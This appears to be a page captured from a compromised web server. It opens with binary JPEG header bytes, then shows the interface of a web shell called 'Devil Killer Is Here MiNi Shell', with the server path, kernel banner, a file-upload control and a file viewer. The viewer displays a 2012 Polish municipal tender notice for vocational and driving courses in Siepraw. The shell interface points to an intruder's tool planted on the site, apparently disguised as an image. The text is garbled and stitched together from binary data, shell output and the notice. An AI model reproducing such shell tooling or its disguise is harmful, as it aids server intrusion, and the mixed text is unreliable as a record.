JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121102/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121102/430300-N-2012.html

<p class="kh_header"><b>Siepraw: Usługi w zakresie przeprowadzenia kursów zawodowych i kursu na prawo jazdy kat. B dla osób zakwalifikowanych do udziału w projekcie systemowym - Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw</b><br>
<b>Numer ogłoszenia: 430300 - 2012; data zamieszczenia: 02.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Sieprawiu , Siepraw 1, 32-447 Siepraw, woj. małopolskie, tel. 12 274 63 03, faks 12 37 21 806.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie przeprowadzenia kursów zawodowych i kursu na prawo jazdy kat. B dla osób zakwalifikowanych do udziału w projekcie systemowym - Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi w zakresie przeprowadzenia kursów zawodowych i kursu na prawo jazdy kat. B dla osób zakwalifikowanych do udziału w projekcie systemowym - Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw. Część 1 Zorganizowanie i przeprowadzenie kursu zawodowego z zakresu opieki nad osobami starszymi i dziećmi, dla 3 uczestników Część 2 Zorganizowanie i przeprowadzenie Kursu prawa jazdy kat. B dla 5 uczestników Część 3 Zorganizowanie i przeprowadzenie kursu zawodowego z zakresu florystyki dla 2 uczestników.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.41.12.00-0, 80.53.00.00-8, 80.56.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia w oparciu o dokumenty załączone do oferty, których wykaz zawiera pkt. 9 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części nr 1. warunek zostanie spełniony jeżeli Wykonawca udokumentuje wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, minimum jedną usługę szkoleniową, polegającą na przeprowadzeniu szkolenia z zakresu opieki nad osobami starszymi dla co najmniej 3 uczestników i minimum jedną usługę szkoleniową, polegającą na przeprowadzeniu szkolenia z zakresu opieki nad dziećmi dla co najmniej 3 uczestników. W wykazie usług należy również podać, daty i miejsca wykonania, liczbę uczestników, odbiorcę usług (instytucję na rzecz, której były wykonywane usługi) oraz załączyć dokumenty potwierdzające, że usługi zostały wykonane należycie. Dla części nr 2. warunek zostanie spełniony jeżeli Wykonawca udokumentuje wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie minimum jedną usługę szkoleniową polegającą na przeprowadzeniu szkolenia na prawo jazdy kategorii B dla co najmniej 5 uczestników szkolenia. W wykazie usług należy również podać, daty i miejsca wykonania, liczbę uczestników szkolenia, odbiorcę usług (instytucję na rzecz, której były wykonywane usługi) oraz załączyć dokumenty potwierdzające, że usługi zostały wykonane należycie. Dla części nr 3. warunek zostanie spełniony jeżeli Wykonawca udokumentuje wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie minimum jedną usługę szkoleniową polegającą na przeprowadzeniu szkolenia na z zakresu florystyki dla co najmniej 2 uczestników szkolenia. W wykazie usług należy również podać, daty i miejsca wykonania, liczbę uczestników szkolenia, odbiorcę usług (instytucję na rzecz, której były wykonywane usługi) oraz załączyć dokumenty potwierdzające, że usługi zostały wykonane należycie Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunki. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia w oparciu o dokumenty załączone do oferty, których wykaz zawiera pkt. 9 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest udokumentować że będzie dysponował w celu realizacji zamówienia następującym potencjałem: Dla części nr 1 - lokalem, dostosowanym do prowadzenia zajęć dla grupy 3 - osobowej, Dla części nr 2. - jeden pojazd tj. samochód osobowy, spełniające wymagania określone w rozporządzeniu Ministra Infrastruktury z dnia 27 października 2005r,. (Dz. U z 2005r., Nr 217 poz. 1834 z późn. zm.) w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów - samochody tej samej marki i typu co używane podczas egzaminu państwowego na kat. B, realizowanego przez Małopolski Ośrodek Ruchu Drogowego w Krakowie. - zlokalizowaną w granicach administracyjnych Gminy Siepraw salą do prowadzenia zajęć teoretycznych spełniającą warunki określone w rozporządzeniu Ministra Infrastruktury z dnia 27 października 2005r., (Dz. U. z 2005r., Nr 217 poz. 1834 z późn. zm.) w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów, wraz z niezbędnym wyposażeniem określonym w opisie przedmiotu zamówienia (oprzyrządowanie techniczne, a także biurka lub ławki oraz krzesła w ilości jedno biurko lub ławka i jedno krzesło dla każdego uczestnika). Dla części nr 3. - lokalem, dostosowanym do prowadzenia zajęć dla 2 osobowej grupy, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunki. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia w oparciu o dokumenty załączone do oferty, których wykaz zawiera pkt. 9 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest udokumentować że będzie dysponował w celu realizacji zamówienia następującym potencjałem: Dla części nr 1 - co najmniej jedną osobą wyznaczoną do realizacji niniejszego zamówienia, która posiada kwalifikacje uprawniające do prowadzenia zajęć w tematyce organizowanego szkolenia. Wskazana osoba musi również posiadać minimum roczny staż pracy związany z przedmiotem zamówienia lub przeprowadzić co najmniej jedno szkolenie związane z tematem zamówienia), tj; - dyplomowana pielęgniarka/pielęgniarz - instruktor pierwszej pomocy - pedagog - psycholog - fizjoterapeuta - terapeuta zajęciowy Dla części nr 2. - jedną osobą z uprawnieniami do prowadzenia szkolenia z zakresu nauki jazdy tj. wpisanymi do prowadzonej przez właściwego starostę ewidencji instruktorów nauki jazdy i posiadających ważną legitymację instruktora, - jednym lekarzem specjalistą posiadającym uprawnienia określone w § 14 Rozporządzenia Ministra Zdrowia z dnia 7 stycznia 2004r., (Dz. U. z 2004r., Nr 2 poz. 15) w sprawie badań lekarskich kierowców i osób ubiegających się o uprawnienia kierowania pojazdami oraz posiadający zaświadczenie o którym mowa w § 15 ust 1 w/w rozporządzenia tj. zaświadczenie o uzyskaniu uprawnień do przeprowadzania badań lekarskich, o których mowa w art. 122 ustawy z dnia 20 czerwca 1977r., Prawo o ruchu drogowym, - jedną osobą uprawnioną do przeprowadzania szkolenia z zakresu pierwszej pomocy tzn. ratownikiem medycznym, lekarzem systemu lub pielęgniarką systemu - w rozumieniu przepisów ustawy z dnia 8 września 2006., o Państwowym Ratownictwie Medycznym (Dz. U z 2006r., Nr 191 poz. 1410 z późń. zm.). Dla części nr 3. - co najmniej jedną osobą posiadającą wykształcenie wyższe o kierunku: ogrodnictwo lub architektura krajobrazu lub florystyka lub ukończyła studia podyplomowe o jednym z podanych kierunków. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunki. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia w oparciu o dokumenty załączone do oferty, których wykaz zawiera pkt. 9 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia w oparciu o dokumenty załączone do oferty, których wykaz zawiera pkt. 9 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- wypełniony formularz oferty stanowiący załącznik nr 1 do SIWZ. - oświadczenie osób fizycznych zgodnie z załącznikiem nr 7 do siwz - pełnomocnictwo podpisane przez osobę (osoby) upoważnione do dokonywania czynności prawnych w imieniu Wykonawcy, w przypadku gdy Wykonawca wyznaczył osobę mającą reprezentować go w postępowaniu o zamówienie publiczne</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dla części I, II, II: Zamawiający przewiduje możliwość zmian do niniejszej umowy w przypadku zmiany osób przewidzianych do realizacji zamówienia ze względu na: a) śmierć, chorobę lub inne zdarzenie losowe uniemożliwiające osobom wskazanym do realizacji zamówienia przeprowadzenie zajęć, b) nie wywiązywanie się osób prowadzących zajęcia z należytego wykonania przedmiotu zamówienia, c) wystąpienie innych przyczyn niezależnych od Wykonawcy (np. rezygnacji) skutkujących koniecznością zmiany osób przewidzianych do realizacji zamówienia. d) Wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy. e) zmian w harmonogramie szkolenia. f) Zmiany nazwy, adresu i stron reprezentujących strony umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.siepraw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Sieprawiu, 32-447 Siepraw 1, pok.nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.11.2012 godzina 09:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Sieprawiu, 32-447 Siepraw 1, pok.nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu zawodowego z zakresu opieki nad osobami starszymi i dziećmi dla 3 uczestników.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Celem kursu jest zdobycie uprawnień niezbędnych do wykonywania zawodu opiekun osób starszych i dzieci. 2) Program kursu obejmuje 150 godzin (40 godzin teorii, 110 godzin zajęć praktycznych) składa się z następujących zagadnień: - pierwsza pomoc przedmedyczna - przepisy dotyczące bezpieczeństwa i higieny pracy podczas opieki nad dzieckiem i osobą starszą - pielęgnacja i higiena dziecka, osoby starszej, osoby chorej leżącej - zawód opiekuna/etyka zawodowa - ustalenia warunków pracy z pracodawcą oraz współpracy z podopiecznym i jego rodziną - zasad żywienia i zaleceń dietetycznych - podstawy psychologii komunikacji z podopiecznym oraz jego rodziną - planowanie, organizowanie i prowadzenie pracy z dzieckiem - organizacja czasu wolnego podopiecznego - elementy rehabilitacji 3) Zajęcia teoretyczne odbywać się mają na terenie Gminy Siepraw. 4) Zajęcia praktyczne winny odbywać się w granicach administracyjnych powiatu myślenickiego lub miasta Kraków. 5) Wszelkie koszty związane z organizacją zajęć praktycznych (tj. koszty dojazdu uczestników, wynajem sali) ponosi Wykonawca. 6) Jedna godzina zajęć teoretycznych odpowiada 45 min. oraz 15 min. przerwy. 7) Jedna godzina zajęć praktycznych odpowiada 60 min. 8) Zajęcia teoretyczne mają trwać 6 godzin dziennie, od poniedziałku do piątku w godzinach od 900 -1500. 9) Zajęcia praktyczne mają trwać nie dłużej niż 8 godzin dziennie, w dni robocze od poniedziałku do piątku. 10) Godziny zajęć praktycznych ustala indywidualnie Wykonawca z uczestnikami zajęć, z zastrzeżeniem że zajęcia mają rozpoczynać się nie wcześniej niż od godziny 800 i kończyć nie później niż o godzinie 1800. 11) Zakres praktyk musi obejmować zajęcia w Domach Pomocy Społecznej, przedszkolach i oddziałach rehabilitacyjnych, pod nadzorem Wykonawcy. 12) Wykonawca ma obowiązek zapewnić obiad jednodaniowy, każdemu uczestnikowi kursu, w dni w których odbywać się będą zajęć teoretyczne oraz kawę, herbatę. 13) Pomieszczenia, w których zostaną przeprowadzone zajęcia teoretyczne winny być przystosowane pod względem sanitarnym, przeciwpożarowym i BHP do prowadzenia szkoleń dla osób w ilości stosownej do określonej w opisie przedmiotu zamówienia. 14) Wykonawca na okres trwania kursu zawodowego, wyposaży sale szkoleniowe w odpowiedni sprzęt i materiały niezbędne do prawidłowej pracy na zajęciach. 15) Zajęcia z zakresu pierwszej pomocy przedmedycznej mogą prowadzić jedynie osoby uprawnione do prowadzenia zajęć edukacyjnych z zakresu udzielania pierwszej pomocy, w myśl. art. 8. Ustawy z dnia 8 września 2006r. o Państwowym Ratownictwie Medycznym (Dz. U. z 2006r., nr 191 poz. 1410 z późn. zm.) 16) Uczestnicy po zdanym egzaminie końcowym, otrzymają zaświadczenie ukończenia kursu poświadczające kwalifikacje i nabyte umiejętności (zaświadczenie zgodne z § 18 Rozporządzenia, o którym mowa w pkt.3.2 Opis zamówienia wspólny dla części I, II i III niniejszego zamówienia: 1) Wykonawca przedłoży szczegółowy harmonogram szkolenia, w terminie do 2 dni od dnia podpisania umowy, a przed rozpoczęciem zajęć części I i III programu szkolenia, zgodnego z przepisami rozporządzenia, o którym mowa w pkt. 3.2 i uwzględniający wymogi niniejszej specyfikacji; 2) Termin rozpoczęcia i zakończenia zajęć z uczestnikami musi zaakceptować Zamawiający. 3) Wykonawca zapewni każdemu uczestnikowi szkolenia materiały dydaktyczne, zgodne z tematyką szkolenia, obejmujące co najmniej podręcznik lub skrypt autorski osoby prowadzącej zajęcia w postaci wydruku trwałego zeszyt do notatek, długopis, ołówek i gumkę, przekazywane uczestnikowi na własność, (zestaw pytań egzaminacyjnych w formie papierowej oraz na płycie CD - dotyczy części II). 4) Wykonawca, na czas trwania szkolenia, ubezpieczy osoby biorące udział w zajęciach, od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do i z miejsca szkolenia, na kwotę minimalną 10.000,00 zł przypadająca na jedną osobę. 5) Wykonawca zobowiązuje się do promocji EFS poprzez umieszczenie logotypu UE oraz logotypu PO KL w salach, w których odbywać się będą zajęcia. 6) Wszystkie dokumenty i materiały szkoleniowe, miejsce prowadzenia kursu, zaświadczenia, certyfikaty, listy obecności, muszą być oznaczone logotypami projektu PO KL, UE. 7) Wykonawca ma obowiązek: a) po zakończonym kursie zebrać i dostarczyć do Zamawiającej następujące dokumenty: - kserokopię wydanych zaświadczeń, materiałów szkoleniowych, które były podczas kursu przekazane uczestnikom, - listy obecności na zajęciach, odbioru materiałów szkoleniowych, publikacji, materiałów pomocniczych, zaświadczeń, certyfikatów, - kserokopię dziennika kursu, wypełnione ankiety i ich analizę. b) prowadzić dokumentację przebiegu szkolenia w tym; - dziennik zajęć zgodny z ustalonym programem, - listy obecności uczestników, wymiar godzin, - tematy zajęć, rejestr certyfikatów i świadectw ukończenia szkolenia. c) Niezwłocznie poinformować Zamawiającego o wszelkich zmianach mających wpływ na przebieg realizacji szkolenia. d) Udostępnić Zamawiającemu na jej żądanie dokumenty dotyczące postępów w realizacji szkolenia. e) Poddać się kontroli dokonywanej przez Zamawiającego jak i instytucje Wdrążającą oraz inne uprawnione podmioty w zakresie prawidłowości realizacji projektu systemowego. f) Przestrzegania regulaminu określonego do działania 7.1.1 PO KL.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.56.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie Kursu prawa jazdy kat. B dla 5 uczestników.</p>
